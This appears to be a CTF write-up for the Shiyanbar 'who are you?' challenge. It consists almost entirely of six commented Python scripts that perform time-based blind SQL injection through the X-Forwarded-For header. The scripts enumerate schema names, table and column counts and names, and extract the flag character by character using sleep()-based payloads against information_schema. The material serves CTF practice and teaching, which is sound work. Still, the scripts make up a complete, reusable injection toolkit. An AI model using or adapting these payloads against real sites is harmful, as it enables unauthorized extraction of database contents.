Shiyanbar (实验吧) CTF challenge "who are you?" — time-based blind SQL injection through the X-Forwarded-For header. Each script below sends a guessed character in that header; a server-side sleep() that outlives the client timeout confirms the guess.

Brute-force the database (schema) names, one character at a time:

# -*- coding:utf-8 -*-  
import requests
import string
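url = "http://ctf5.shiyanbar.com/web/wonderkun/index.php"

# Candidate characters for every position of a name. ' and \ are left out:
# inside the ='%s' literal they break the query under MySQL's default escaping,
# so they can never produce a usable match and only cost a request each.
# Never add a space: under MySQL PAD SPACE collations '' = ' ' is true, so the
# end of a name would look like an endless run of matching spaces.
guess = "".join(c for c in string.ascii_lowercase + string.ascii_uppercase
                + string.digits + string.punctuation if c not in "'\\")

# The timing oracle: a correct guess makes the server sleep(SLEEP_SECONDS) and
# the client gives up after TIMEOUT seconds, so a ReadTimeout means "match".
# Keep TIMEOUT below SLEEP_SECONDS but well above the page's normal response
# time, otherwise a slow (or rate-limited) server is mistaken for a hit.
SLEEP_SECONDS = 5
TIMEOUT = 4
MAX_DATABASES = 100  # upper bound on the number of schemas enumerated
MAX_NAME_LEN = 100   # upper bound on the length of one schema name

# Payload placed in X-Forwarded-For. The header value is assumed to land
# unescaped inside a single-quoted SQL string: the leading quote closes it and
# the trailing "and '1'='1" re-balances the quotes.
# NOTE: without ORDER BY, the "offset" order of information_schema rows is
# whatever MySQL happens to return. Also, under a case-insensitive (_ci)
# collation '=' matches either case, so an upper-case letter is recorded as
# its lower-case twin (lower-case is tried first); compare with BINARY if the
# exact case matters.
PAYLOAD = ("'+ (select case when (substring((select schema_name from "
           "information_schema.SCHEMATA limit 1 offset %d) from %d for 1)='%s') "
           "then sleep(%d) else 1 end) and '1'='1")

database = []

for database_number in range(MAX_DATABASES):
    databasename = ''
    for position in range(1, MAX_NAME_LEN):
        matched = None
        for ch in guess:
            headers = {"X-forwarded-for": PAYLOAD % (database_number, position, ch, SLEEP_SECONDS)}
            try:
                requests.get(url, headers=headers, timeout=TIMEOUT)
            except requests.exceptions.ReadTimeout:
                # Only a read timeout is a hit. A bare `except:` would also
                # count DNS failures, refused connections and Ctrl-C as
                # matches and silently produce garbage names.
                matched = ch
                break
        if matched is None:
            break  # no candidate matched: the name ended at position - 1
        databasename += matched
        print("Scanning the %d database name, the databasename now is %s"
              % (database_number + 1, databasename))
    if not databasename:
        # Nothing matched at position 1: the offset points past the last schema.
        print('Scan complete')
        break
    database.append(databasename)

for name in database:
    print(name)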




Brute-force the number of tables (note: the query counts every table visible in information_schema, across all schemas):

# -*- coding:utf-8 -*-  
import requests
import string 
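url = "http://ctf5.shiyanbar.com/web/wonderkun/index.php"

# Timing oracle: a correct guess makes the server sleep(SLEEP_SECONDS); the
# client aborts after TIMEOUT seconds, so a ReadTimeout means "match".
SLEEP_SECONDS = 5
TIMEOUT = 4
MAX_TABLES = 500  # highest count that is tried (exclusive)

# Payload placed in X-Forwarded-For (assumed to land unescaped inside a
# single-quoted SQL string). count(table_name) with no WHERE clause counts every
# table the DB user can see in every schema (information_schema, mysql, ...),
# not only the application's own database.
PAYLOAD = ("'+ (select case when (select count(table_name) from "
           "information_schema.TABLES ) ='%d' then sleep(%d) else 1 end) and '1'='1")

for table_number in range(MAX_TABLES):
    print('trying %d' % table_number)
    headers = {"X-forwarded-for": PAYLOAD % (table_number, SLEEP_SECONDS)}
    try:
        requests.get(url, headers=headers, timeout=TIMEOUT)
    except requests.exceptions.ReadTimeout:
        # Only a read timeout is a hit; other network errors propagate instead
        # of being mistaken for a match.
        print(table_number)
        break
else:
    print('no match: the table count is not below %d' % MAX_TABLES)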


Brute-force a table name (the script below recovers only the row at offset 41; widen the range to enumerate more):

# -*- coding:utf-8 -*-  
import requests
import string
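url = "http://ctf5.shiyanbar.com/web/wonderkun/index.php"

# Candidate characters for every position of a name. ' and \ are left out:
# inside the ='%s' literal they break the query under MySQL's default escaping,
# so they can never produce a usable match. Never add a space: under PAD SPACE
# collations '' = ' ' is true and the end of a name would never be detected.
guess = "".join(c for c in string.ascii_lowercase + string.ascii_uppercase
                + string.digits + string.punctuation if c not in "'\\")

# Timing oracle: a correct guess makes the server sleep(SLEEP_SECONDS); the
# client aborts after TIMEOUT seconds, so a ReadTimeout means "match".
SLEEP_SECONDS = 5
TIMEOUT = 4
# Window of information_schema.TABLES row offsets to recover, end exclusive.
# As written this is a single row, offset 41 (the 42nd row in whatever order
# MySQL returns them, there is no ORDER BY). Widen it to enumerate more.
FIRST_TABLE = 41
LAST_TABLE = 42
MAX_NAME_LEN = 100  # upper bound on the length of one table name

# Payload placed in X-Forwarded-For (assumed to land unescaped inside a
# single-quoted SQL string). Under a case-insensitive (_ci) collation '='
# matches either case, so upper-case letters are recorded in lower case;
# compare with BINARY if the exact case matters.
PAYLOAD = ("'+ (select case when (substring((select table_name from "
           "information_schema.TABLES limit 1 offset %d) from %d for 1)='%s') "
           "then sleep(%d) else 1 end) and '1'='1")

tables = []

for table_number in range(FIRST_TABLE, LAST_TABLE):
    tablename = ''
    for position in range(1, MAX_NAME_LEN):
        matched = None
        for ch in guess:
            headers = {"X-forwarded-for": PAYLOAD % (table_number, position, ch, SLEEP_SECONDS)}
            try:
                requests.get(url, headers=headers, timeout=TIMEOUT)
            except requests.exceptions.ReadTimeout:
                # Only a read timeout is a hit; a bare `except:` would turn
                # every network error into a bogus character.
                matched = ch
                break
        if matched is None:
            break  # no candidate matched: the name ended at position - 1
        tablename += matched
        print("Scanning the %d table name, the tablename now is %s"
              % (table_number + 1, tablename))
    if not tablename:
        # Nothing matched at position 1: the offset points past the last row.
        print('Scan complete')
        break
    tables.append(tablename)

for name in tables:
    print(name)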


Brute-force the number of columns (again counted over all of information_schema.COLUMNS, not one table):

# -*- coding:utf-8 -*-  
import requests
import string
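url = "http://ctf5.shiyanbar.com/web/wonderkun/index.php"

# Timing oracle: a correct guess makes the server sleep(SLEEP_SECONDS); the
# client aborts after TIMEOUT seconds, so a ReadTimeout means "match".
SLEEP_SECONDS = 5
TIMEOUT = 4
MAX_COLUMNS = 1000  # highest count that is tried (exclusive)

# Payload placed in X-Forwarded-For (assumed to land unescaped inside a
# single-quoted SQL string). count(COLUMN_name) with no WHERE clause counts
# the columns of every table visible in information_schema, not one table's.
PAYLOAD = ("'+ (select case when (select count(COLUMN_name) from "
           "information_schema.COLUMNS ) ='%d' then sleep(%d) else 1 end) and '1'='1")

for column_count in range(MAX_COLUMNS):
    print('trying %d' % column_count)
    headers = {"X-forwarded-for": PAYLOAD % (column_count, SLEEP_SECONDS)}
    try:
        requests.get(url, headers=headers, timeout=TIMEOUT)
    except requests.exceptions.ReadTimeout:
        # Only a read timeout is a hit; other network errors propagate instead
        # of being mistaken for a match.
        print(column_count)
        break
else:
    print('no match: the column count is not below %d' % MAX_COLUMNS)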



Brute-force a column name (the script below recovers only the row at offset 482; widen the range to enumerate more):

# -*- coding:utf-8 -*-  
import requests
import string 
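url = "http://ctf5.shiyanbar.com/web/wonderkun/index.php"

# Candidate characters for every position of a name. ' and \ are left out:
# inside the ='%s' literal they break the query under MySQL's default escaping,
# so they can never produce a usable match. Never add a space: under PAD SPACE
# collations '' = ' ' is true and the end of a name would never be detected.
guess = "".join(c for c in string.ascii_lowercase + string.ascii_uppercase
                + string.digits + string.punctuation if c not in "'\\")

# Timing oracle: a correct guess makes the server sleep(SLEEP_SECONDS); the
# client aborts after TIMEOUT seconds, so a ReadTimeout means "match".
SLEEP_SECONDS = 5
TIMEOUT = 4
# Window of information_schema.COLUMNS row offsets to recover, end exclusive.
# As written this is a single row, offset 482 (the 483rd row in whatever order
# MySQL returns them, there is no ORDER BY). Widen it to enumerate more.
FIRST_COLUMN = 482
LAST_COLUMN = 483
MAX_NAME_LEN = 100  # upper bound on the length of one column name

# Payload placed in X-Forwarded-For (assumed to land unescaped inside a
# single-quoted SQL string). Under a case-insensitive (_ci) collation '='
# matches either case, so upper-case letters are recorded in lower case;
# compare with BINARY if the exact case matters.
PAYLOAD = ("'+ (select case when (substring((select COLUMN_name from "
           "information_schema.COLUMNS limit 1 offset %d) from %d for 1)='%s') "
           "then sleep(%d) else 1 end) and '1'='1")

columns = []

for column_number in range(FIRST_COLUMN, LAST_COLUMN):
    columnname = ''
    for position in range(1, MAX_NAME_LEN):
        matched = None
        for ch in guess:
            headers = {"X-forwarded-for": PAYLOAD % (column_number, position, ch, SLEEP_SECONDS)}
            try:
                requests.get(url, headers=headers, timeout=TIMEOUT)
            except requests.exceptions.ReadTimeout:
                # Only a read timeout is a hit; a bare `except:` would turn
                # every network error into a bogus character.
                matched = ch
                break
        if matched is None:
            break  # no candidate matched: the name ended at position - 1
        columnname += matched
        # Message text kept as in the original script ("scanning column name #N").
        print('正在扫描第%d个列名,the cloumnname now is %s' % (column_number + 1, columnname))
    if not columnname:
        # Nothing matched at position 1: the offset points past the last row.
        print('扫描完成')  # "scan complete"
        break
    columns.append(columnname)

for name in columns:
    print(name)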



Brute-force the flag content (column `flag` of table `flag`):

#-*-coding:utf-8-*-
import requests
import string
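url = "http://ctf5.shiyanbar.com/web/wonderkun/index.php"

# Characters tried at every flag position. The scan stops at the first position
# where nothing matches, so a flag character outside this set (e.g. '_' or '-')
# silently truncates the result: extend the set if the value looks cut short,
# but never add a space (under MySQL PAD SPACE collations '' = ' ' is true and
# the end of the flag would never be detected) and skip ' and \, which break
# the ='%s' literal.
guess = string.ascii_lowercase + string.ascii_uppercase + string.digits

# Timing oracle: a correct guess makes the server sleep(SLEEP_SECONDS); the
# client aborts after TIMEOUT seconds, so a ReadTimeout means "match". Keep the
# gap between the two larger than the page's normal response-time jitter.
SLEEP_SECONDS = 7
TIMEOUT = 6
MAX_FLAG_LEN = 100  # upper bound on the flag length

# Payload placed in x-forwarded-for (assumed to land unescaped inside a
# single-quoted SQL string). Under a case-insensitive (_ci) collation '='
# matches either case, so an upper-case flag character is recorded in lower
# case (lower-case is tried first); compare with BINARY if the case matters.
PAYLOAD = ("' +(select case when (substring((select flag from flag ) from %d for 1 )='%s') "
           "then sleep(%d) else 1 end ) and '1'='1")

flag = ""

for position in range(1, MAX_FLAG_LEN):
    matched = None
    for ch in guess:
        headers = {"x-forwarded-for": PAYLOAD % (position, ch, SLEEP_SECONDS)}
        try:
            requests.get(url, headers=headers, timeout=TIMEOUT)
        except requests.exceptions.ReadTimeout:
            # Only a read timeout is a hit; connection errors propagate.
            matched = ch
            break
    if matched is None:
        print("no character matched at position %d: end of flag, or a character outside the tried set" % position)
        break
    flag += matched
    print("flag: %s" % flag)
print('result:' + flag)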

        When submitting, wrap the recovered string as ctf{...}: the script's character set contains no braces, so it recovers only the text inside them.


